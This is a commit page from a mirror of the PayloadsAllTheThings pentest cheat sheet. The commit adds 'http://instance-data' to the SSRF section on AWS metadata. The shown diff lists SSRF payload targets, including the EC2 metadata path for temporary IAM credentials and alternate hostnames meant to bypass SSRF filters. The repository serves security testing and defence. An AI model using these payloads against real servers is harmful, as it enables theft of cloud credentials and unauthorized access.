Mirrors/PayloadsAllTheThings
2
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-11-10 07:04:22 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update AWS SSRF tips

Browse source 
Added http://instance-data
This commit is contained in:
Techbrunch 2020-03-11 15:20:51 +01:00 committed by GitHub
parent c20f84d09c
commit 3abf2aff2a
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3
Server Side Request Forgery/README.md
View file

@ -394,7 +394,7 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at `http://169.254.169.254`
Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
```powershell
Always here : /latest/meta-data/{hostname,public-ipv4,...}
@ -405,6 +405,7 @@ Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
DNS record
```powershell
http://instance-data
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/